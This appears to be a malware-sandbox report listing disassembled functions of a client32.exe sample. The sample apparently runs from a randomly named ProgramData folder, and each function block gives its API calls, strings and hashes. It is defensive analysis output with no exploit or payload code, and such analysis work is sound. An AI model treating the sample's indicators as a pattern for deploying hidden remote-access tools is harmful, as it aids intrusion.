Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateFocusWindow_malloc_memsetwsprintf
String ID: edit
API String ID: 1305092643-2167791130
Opcode ID: 753a1efb26b9667e6f546820d7c2eab9c136c08ab1e0f24e29535bc7fdbc4f7b
Instruction ID: e81607fb03d3f2f95005a1d43bd356d739516b9639758e6caabf034df3046c31
Opcode Fuzzy Hash: 753a1efb26b9667e6f546820d7c2eab9c136c08ab1e0f24e29535bc7fdbc4f7b
Instruction Fuzzy Hash: A2519FB5A00606AFE715CF64DC81BAFB7E5FB88354F118569E955C7340EB34AA02CB60

Function 11009270 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110092E5
_memmove.LIBCMT ref: 11009336

Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA

Strings

string too long, xrefs: 110092E0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
Instruction ID: dd3894f676f01ff6a75acb4aa2435548b18b289b65f075ee81d5ee4d5d084719
Opcode Fuzzy Hash: 22491d451eb23d87cec3ea30fc5d884b072beb3f123d3bfee90730829ce68beb
Instruction Fuzzy Hash: 8C31DB72B046108BF720DE9DE88099EF7EDEB957B4B20491FE589C7680E771AC4087A0

Function 1113BA80 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

EnableWindow.USER32(00000000,00000000), ref: 1113BB3F
EnableWindow.USER32(00000000,00000001), ref: 1113BB6C

Strings

8zi, xrefs: 1113BAEF

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnableWindow
String ID: 8zi
API String ID: 4266128931-881272250
Opcode ID: 62e645bedad9200079e1a58fce52525f362be87d98cad01f5a335e837e7e2753
Instruction ID: 2e5f7d8bc298bacf74e83799a3fa1784e23a23d80031641900348d7f4e7f8b75
Opcode Fuzzy Hash: 62e645bedad9200079e1a58fce52525f362be87d98cad01f5a335e837e7e2753
Instruction Fuzzy Hash: 0C31F675B146199FE718CF65C841BAAF7E8FB84725F008129ED19C7788EB35E800CB94

Function 110E1260 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110E12C3
_memmove.LIBCMT ref: 110E131D

Strings

string too long, xrefs: 110E12BE

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argument_memmovestd::_
String ID: string too long
API String ID: 256744135-2556327735
Opcode ID: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
Instruction ID: 4942d9d917c342fdb8aca387283afa0bcd15718542992abc979dc690a8db670a
Opcode Fuzzy Hash: f63589a1e1e49e26468f6bc49513f74121357c805117a5e251a3e538b8b1e039
Instruction Fuzzy Hash: 7931B372B152058F8724DE9EEC848EEF7EAEFD57613104A1FE442C7640DB31AC5187A1

Function 1103B150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

_calloc.LIBCMT ref: 1103B162
_free.LIBCMT ref: 1103B25B

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

CLTCONN.CPP, xrefs: 1103B175

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ErrorExitLastMessageProcess_calloc_freewsprintf
String ID: CLTCONN.CPP
API String ID: 183652615-2872349640
Opcode ID: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
Instruction ID: 20d7259e8fe77d3daff0af84d5ff1d15e913130fc2269d1c6afd747bd8efee53
Opcode Fuzzy Hash: 8337f5e747ebaeb2686f90dd4bebe07236585bab06edcc3415c76220b6505581
Instruction Fuzzy Hash: F231C875A10B069AD310CF95C881BB7F3E4FF44318F048669E9598B641F774F905C3A5

Function 1108F720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

std::exception::exception.LIBCMT ref: 1108F7BC
__CxxThrowException@8.LIBCMT ref: 1108F7D1

Strings

L, xrefs: 1108F805

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_malloc_memsetstd::exception::exceptionwsprintf
String ID: L
API String ID: 1338273076-2909332022
Opcode ID: a7e1677c27ef662696a98ac99ea11074980b4c4eddb3892470d0d54db686ef1f
Instruction ID: 369f405687447c84649efdd58832c02068d177a3a0274ca2d5cff2ffa4839110
Opcode Fuzzy Hash: a7e1677c27ef662696a98ac99ea11074980b4c4eddb3892470d0d54db686ef1f
Instruction Fuzzy Hash: 9F3160B5D04259AEEB11DFA4C840BDEFBF8FB08314F14426EE915A7280D775A904CBA1

Function 11147850 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON

Download Yara Rule

APIs

FormatMessageA.KERNEL32(00000400,?,00000000,00000000,00000010,00000401,?,?,75BF8400,00000010), ref: 111478DB
wvsprintfA.USER32(00000010,?,?), ref: 111478F2

Strings

ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>, xrefs: 1114790A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FormatMessagewvsprintf
String ID: ERROR TOO LONG: fmt_string=<%s>, s=<%.80s>
API String ID: 65494530-3330918973
Opcode ID: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
Instruction ID: 19ecc3acc586c3c0044aa7ac842438cb7b35c94f742bf7000cc937f5be2b0cb7
Opcode Fuzzy Hash: 84ff1f22b3e63b30bcd43db78ed2a3d83fe9186dadbe20577e5398af88fbbc10
Instruction Fuzzy Hash: 3E21B6B5D0026DAEEB10CF90DC81FEAFBBCEB44618F104169E61993640E7756E44CBE5

Function 1100F2A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F2BB

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

std::_Xinvalid_argument.LIBCPMT ref: 1100F2D2

Strings

string too long, xrefs: 1100F2B6, 1100F2CD

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
String ID: string too long
API String ID: 963545896-2556327735
Opcode ID: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
Instruction ID: 9c03118c2fef7a30d7f16138fb3dcb5344bdbe7bcaefeaa8633fdbb4ef9eb1a5
Opcode Fuzzy Hash: 75f838df1ffa959431b4a62d365d349d8fd4399dcfd8cc9140359aaa01b8e6d6
Instruction Fuzzy Hash: E711E9737006148FF321D95DA880BAAF7EDEF957B4F60065FE591CB640C7A1A80083A1

Function 110232A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetDlgItemTextA.USER32(?,?,?,00000100), ref: 110232D7
SetDlgItemTextA.USER32(?,?,?), ref: 1102335F

Strings

..., xrefs: 1102331A

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemText
String ID: ...
API String ID: 3367045223-440645147
Opcode ID: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
Instruction ID: 288fafb08c6b2ba60c27d59f26b93e6fc9d809d534a4309207b318a271e26125
Opcode Fuzzy Hash: 3c7fd1be2824b6022330b2e6fcbe42859dc36aafcf172dfa7595ecaab8fe21c6
Instruction Fuzzy Hash: 1121A2756046199BCB24CF68C880FEAF7F9AF99304F1081D9E58997240DAB0AD85CF90

Function 110B9730 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

ShowWindow.USER32(8D111949,00000009,?,?,?,?,?,?,?,?,?,?,110BA876,110C032C), ref: 110B977B

Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004C), ref: 110B8AF2
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004D), ref: 110B8AF9
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004E), ref: 110B8B00
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(0000004F), ref: 110B8B07
Part of subcall function 110B8AC0: SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B8B16
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(?), ref: 110B8B24
Part of subcall function 110B8AC0: GetSystemMetrics.USER32(00000001), ref: 110B8B33

MoveWindow.USER32(8D111949,?,?,?,?,00000001), ref: 110B97A3

Strings

j CB::OnRemoteSizeRestore(%d, %d, %d, %d), xrefs: 110B97BD

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: System$Metrics$Window$InfoMoveParametersShow
String ID: j CB::OnRemoteSizeRestore(%d, %d, %d, %d)
API String ID: 2940908497-693965840
Opcode ID: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
Instruction ID: 55e82b17da46594b085dc316db9a602337c46ecd43c839d0c1f018f75bd6c70b
Opcode Fuzzy Hash: 60bc414364147a50c916ce8f7c8964549782f9578ddb51fb58b5c7b9b217b13c
Instruction Fuzzy Hash: DA21E875B0060AAFDB08DFA8C995DBEF7B5FB88304F104268E519A7354DB30AD41CBA4

Function 11147DB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75COMMON

Download Yara Rule

APIs

Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\o2xqxqs\client32.exe,00000104,?,11144A43,?), ref: 11144819

_memmove.LIBCMT ref: 11147E21

Strings

Failed to get callstack, xrefs: 11147DCD

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentFileModuleNameProcess_memmove
String ID: Failed to get callstack
API String ID: 4135527288-766476014
Opcode ID: 6d291316c9707b9d5de96ff57def55fdcbcac1aed423948ea993df945ecfabe7
Instruction ID: c4f3f0ba0a7ce16b324cb1fe4e02486c3046b65235c6881726d0f950d9e89ba9
Opcode Fuzzy Hash: 6d291316c9707b9d5de96ff57def55fdcbcac1aed423948ea993df945ecfabe7
Instruction Fuzzy Hash: 1921A175A0011D9BCB14DF64DD84BEEB3B8EB44618F0042DAE80DAB740EB31AE54CB90

Function 11145990 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 111459F6

Strings

:, xrefs: 111459CB

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandFileModuleNameStrings
String ID: :
API String ID: 2034136378-336475711
Opcode ID: 42ae8d5958dd99ae1441cd8cb9ddcb3a1c69e94bb901778933542141fb49932d
Instruction ID: 2f025fe159ad018ca32f107a988c6b97e10c7b7f69d8ea9c63f353a653f43b24
Opcode Fuzzy Hash: 42ae8d5958dd99ae1441cd8cb9ddcb3a1c69e94bb901778933542141fb49932d
Instruction Fuzzy Hash: 65213738C043599FDB21CF64CC44FD9BB68AF16708F6041D4D59967942EF706A8DCBA1

Function 11043760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(?,?), ref: 11043784
GetClassNameA.USER32(?,?,00000040), ref: 11043799

Strings

tooltips_class32, xrefs: 110437A3

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClassNameProcessThreadWindow
String ID: tooltips_class32
API String ID: 2910564809-1918224756
Opcode ID: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
Instruction ID: 7b66b5eeeba6873e3bd91d5637fb3b576f23a09c5117b8e426f31f0334ec312d
Opcode Fuzzy Hash: 6d3c4fdc3a6f6e7596f8af0fff3375ada305fabf060d9fd927d6679c10a610bf
Instruction Fuzzy Hash: DF112B71A080599BD711DF74C880AEDFBB9FF55224F6051E9DC819FA40EB71A906C790

